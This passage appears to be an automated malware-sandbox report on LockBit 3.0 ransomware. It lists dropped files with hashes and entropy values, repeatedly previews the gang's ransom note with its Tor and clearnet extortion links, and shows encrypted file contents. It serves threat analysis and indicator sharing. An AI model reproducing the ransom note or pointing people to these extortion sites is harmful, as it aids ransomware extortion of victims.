                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.975635245356652
                Encrypted:false
                SSDEEP:192:C4lmjb+OHYu/3YqMY6OK8S5s7Q/oeCxeQBghCNArgdJ9o:CuHOHYu/PMYhK8VM7S3eh2sg+
                MD5:93B3D83153CDA7916B90AAA35B75BE2E
                SHA1:C55437DA3AC9F26031A9FD651231025632E77B6A
                SHA-256:74528F4B8897717343C5A60E45537B2D9C5277DF07F5623FA3616A183BE7A614
                SHA-512:0B38F96654D5FF7657584C9C1F3EBF30F21C9E1012DD10B4D242B0E188C81728EC70D691134BECEA592681CD859028C3BB2D434DA44914E8BA96AC7D79682A08
                Malicious:false
                Preview:Jo..pCzH.c(. .z'H)..c}.f:Z.Z....i.-..&S..7..%....*.K.....U.\..#.V....fa..'`6r......nr".I...s......V.#...k..g......]..S6.....Y...}.j"p.zY=.wA..h.)....@u....Vr..0..t.D..ToY0jd.u.$.^\Q.....`......H.Z.Z.W..`hXT..UHC..D.......F......`...r..`..Q....i..+.S...p..Q...._O.f49...;.......,m......Zn.h.2#^.Fy....Nj>gr.:........R..`A..e....\3...Kc..X._\..3..'r.......7AO[.7....4...@........g.....Q.....z..na7ar.~T.F.;tM..#.2}...l..L............U..90..L..a.h.q2f2.].7.RP3......+X.Cr.5..P.....w^......?...V..r&..2.9....h...np...:.f..6.Z......... . ...Hf.n$W#[";T. t.{.h(...T.2.... =n|gv....G.......,..H..D.8;{5Z..G.0J."..YU-.'.?.F5.`M..N....g.]ukc..3..K\hj.../....x.t.aPo.}..Dx.^r.@.Z...A.!..?JC....8....r(8V....P.....#.P....M@...U...D..#....P.+...B..R..y..^.D..7%.&wL.~.H...U.......O...H.5..I.S.@.....FD..V...$.a|../.4.......F......-&..i.J.^.i..uTh&.I...j..S..#..O....G#T.w..H.z.y,{...nm.....f..T...m.....uX7`J......>L.7..q.?..Q..Ec..Q......c. ,(..F...

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):65787
                Entropy (8bit):7.996844463003436
                Encrypted:true
                SSDEEP:1536:mVpLHkDpzGAn5E1j+AH842b8tRl3396QV6tz2Q3lBKWggA95:mVmjaRuab/6tzdMgA95
                MD5:EDB629F573CF038893365CA608E0048A
                SHA1:FE05284F3FA5E64FD24C104192CE9E4EE278E573
                SHA-256:47C094F818A35375A5E78553A9E55F83AE265B5B5332CC8045545F25C18D0849
                SHA-512:B72A790F071993F201CDBC9BD38F8CBDE942951FF2B2BB2AF5C4FCFC208E82FE3CF3702F9CFFF0E93595008E179BAC960FD0DD96C66F0AAAFC9666297ACC500D
                Malicious:true
                Preview:."..N.I...ylr0\...2k@.0(6.&.p*_.3... ...7.b&.3H.;..v.>.J...JN..]).i....o7;@g.p....#HH!...p].O.5..W=..Kl.@....j.,.A..l...~..U.3.._.Y..|#..>..+sZ..T...8..M.g..^...6_..H.....r.O/j. {v....Q}.@........Bl..$...z.>f...P.....iw.t...4...~m=QQ..%{(2..&qc\..e.~.!O@......=1.x....$....\/......M..O..y...e^....i@?....K..(....xn.>...jX.7z...L:...b......}.q.r.G.8[!.I..F.^...<9.[;.2q5.@..h..1...G.o....%.7~4.S^.Q~\.^...L..b......9.......'4.....OV.yu.o....I.2h.j!..C.....2.`..bx...8.....G+.i0...[r..8...|....g8p9.RL.a.....>U.#.......b.o%;<....X.s{@.N `.N.n#.....E..m..$..2.-D.U...=..}.`6..n...........N..L...h....IB.p....PT.#...Uw......N...4G.]...'.._.....+..O...2.W...0.qs...W...ds...!Vi!.:..YcU~....S..u....$..iN#....h......`.k.....p..>.O.m..S.Y+.?% _)V.).Vc.A...LT4...B..#..Q5..p.j.haC|..c......^..s..:....d..Q..K...3.q=.-@%P+.........T...V.~......5..W..g.na...O...c...3Wp......X.z3B....|gW...\.v,M..H...8.y..+.5.>!.....&O..qL...B..C...,...^...P8....H..t.e\...[.

                C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):131330
                Entropy (8bit):7.998427329083817
                Encrypted:true
                SSDEEP:3072:0mKERVy5SsI6NAgs90inS7Cod6tZnrurJmfj0QcO2Y8DD:0mKjLI6NAgFinSyDjjX8n
                MD5:C6324A4A462AA14FDB80FD88144501CA
                SHA1:0F6FF4492D148F0C267888656B3E8756A459300A
                SHA-256:247910FC5DAD5B5CE2D26CD6F0EEACC9BC0CAD58925F318E6FAB691ED7D39A52
                SHA-512:A8023EBB4A7B2273A38D3904012153B57F7112738882009842D7FA919B65F4EDCCFF19CA942191141BBCC1A9CE7B91803480F89AE2D1E272CF7DFE147EC65AEC
                Malicious:true
                Preview:.;.../.[Mf...7.}.......m|^o8RH2..si.\`{.t.;p.u.)t...aom.y9Fv.8.b..(.#..";. .0......)L.[......U.....B...,.J..@..t-.K..?...o..m'....&...P_hk..WT..x..~L.a.....0V...+...cm...ZUJ...._..l.G.Z.DW.C.."..[.i`.%....4X.o..<f.(5.....>f..........3....$.e#.+.C..h..3..:...c>..V.W.N...q..\...B...s.....6..J..JL...&..B!,.-..@....O..2..D..R@..6.....%.M.6..+..xi..LLm...yu[.....2.$........?I.ng....&%,L@...%..mf.*+.@N....F.".-.SY..-.../......kk...%r...`.=...z8T2.m.!^wB._..jR..H[l]...k.z..RZ.T....v.R$3..e.............N..f.H./............rY^.........S..8C.<..Co...P..(..\#..r..."..AL.i..:..............w`~.;.b...n....)Ko....2....U.vaS...,.=.H..F..@o.._.?..9..r.Fu8[.p......l.p......j...F.Lv.j...w"*..L0..N.4..0..-D.tg..qv.$5........./...$q..H.;NM.....4..{^...c..ro..!......l.?(.P.....e....Z....-..N.4Z....q...#%..'$..>.VNYj......3.W....b.4u[..gZ.N}.E..e...0..g?.;;.mx....D"4-\sX"..5.}..^.B..F.......A....p..(.E...e.b?....JB.Z..^.5.^&..u.e.l...z8y......m.....52j.#

                C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):131329
                Entropy (8bit):7.998782411794217
                Encrypted:true
                SSDEEP:3072:JIfUYWfQo+E2W9J4FjUQPRZXo/PeskFc96RaReSbjzPMomA:dYWcfUQ5ZXOPeskZaReWr
                MD5:FFF5C8A9BEF861ADF0691560258CA127
                SHA1:F3023B0F8B68856C9B6F0C8AC1CFE1D102935906
                SHA-256:887880078E263380441AAD800F6BE9E259B789175A7A54FF8B12079ADB088B25
                SHA-512:FE4BB94CFC53CEB02FA16412B734541C93345A9F6191B646C7C29B44B1A6719C9F020DAE17E3C21C25449EE75524DC99B4D5665935C3158BE9FE05FEA1302E25
                Malicious:true
                Preview:.}..p.j.....<.....u...).hT|..w^....6.T....*t...|.$....7.?.bL|E1...>,....../..8..@r.m......s..;.........i..J.{.o....z...U.p..`...".;m....:..Pk.A._.j>.s2d..L=........s..@.P..c....8..7...N.V.k;B.......[.3...^...z....h.N.i]1*nX...dK..Zl..L7H..S4Q.,D.h.d"H..+....h.......j..../" ..A....~9./...+.1m...z...06....G..o.j.)..C...9u8..f.A'.....,).*Cr..\.."n.. .p.6J.?...UM8.cN{h..D9..eDf...,j.7.A.L..]!.|p..".....4..X.....,Td."<..uK.`.h,.._...j.g.^./..<I7.....v?ky....T.L..$.....>..@..% |..7.XKo..q..'.F.._..0.FJ2.........Pd.....Z..)..b..5.G...A.......:...:..1xIq.pT.;.VwP..1...h..O.....8"..?b.@.O...}.Fl.G.9.3.:....H.s.V.....h...g..c..{..y0.g.}s.C....)....C((;...Vjg(.4.Rd....|Y..x$...6w..\g..o..i...S..[v.A."b.x......H..zE..'U..:..]u)....K.\...D..l........[.w..A.Eh.$jF.u\.9@#^".z ..y..o..+agL2o.nSs...jr.WV4...b........;..u.1...U..'.G.T.u"...$@2........>.g..C/..M.....,.S..A....N.... ......:.B.[.uS.....J. ..%fe...!.p.C...D'.....E..|.c....JK0.M.lsxQ..Y_

                C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\ActiveSync\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

